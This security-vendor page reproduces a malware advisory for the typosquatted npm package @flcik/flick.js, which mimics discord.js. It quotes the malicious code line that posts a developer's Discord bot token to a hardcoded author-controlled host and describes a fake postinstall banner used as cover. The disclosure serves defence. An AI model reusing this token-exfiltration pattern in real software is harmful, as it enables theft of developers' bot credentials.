Skip to main content

Boteraser | Website and Server Security Solutions

🛡️ MAL-2026-10521 — flick.js

⚪ Unknown ✅ No Known Exploit OSV
N/A
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Malicious code in @flcik/flick.js (npm)

Source: amazon-inspector

@flcik/[email protected] replicates the discord.js public API surface (FlickClient, GatewayIntentBits, SlashCommandBuilder, ButtonStyle, MessageFlags, the canonical client.login('YOUR_BOT_TOKEN') + messageCreate/!ping/Pong! example) but the implementation diverges in one critical place: client.login() in flick.js takes the supplied token and POSTs it to a hardcoded author-controlled endpoint. Specifically, flick.js line 1025 issues await this._rest.post('/api/auth/token', { token: this.token }) against DEFAULT_BASE_URL='https://flick-xmfx.onrender.com' (flick.js line 19). Any developer who installs this package mistaking it for discord.js and pastes their Discord bot token into client.login(...) ships that token to flick-xmfx.onrender.com on the first call. Several corroborating signals confirm the package is engineered as a credential funnel rather than a real SDK: (1) package.json declares "main": "index.js" but no index.js exists in the tarball — the only shipped JS files are flick.js and postinstall.js, so require('@flcik/flick.js') throws, indicating the package is not built for library consumption; (2) postinstall.js fabricates a fake npm install summary (✓ added <count> packages in <secs>s) padded with 400–1200ms of randomness to imitate npm's own completion banner — social-engineering cover typical of typosquats; (3) the package name @flcik/flick.js is a transposition of flick/flick.js styled to brand-confuse against discord.js. Installer harm is direct: Discord bot tokens are bearer credentials granting full control of the bot account (message read/send, server join, user impersonation in the bot's scope).

Source: ghsa-malware

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Affected software

MAL-2026-10521 is recorded against 1 package.

  • @flcik/flick.js

Timeline and source

Published on 14 July 2026. No public exploit is currently recorded for this entry. Record sourced from OSV.

References

github.com (Advisory)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)

Details

Severity Unknown
CVSS Score N/A
CVSS Vector N/A
CWE N/A
Public Exploit ✅ No
Source OSV
Published 2026-07-14
Updated 2026-08-20
Modified 2026-07-14
Fix URL N/A

Affected Packages

Software From version Fixed in
@flcik/flick.js

Free Vulnerability Check

Is your site affected by MAL-2026-10521?

BotEraser helps you identify potentially vulnerable plugins and themes by checking your installation against MAL-2026-10521 and other known CVE records.

Scan My Site Free →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesMalicious packagesMalicious packages 2026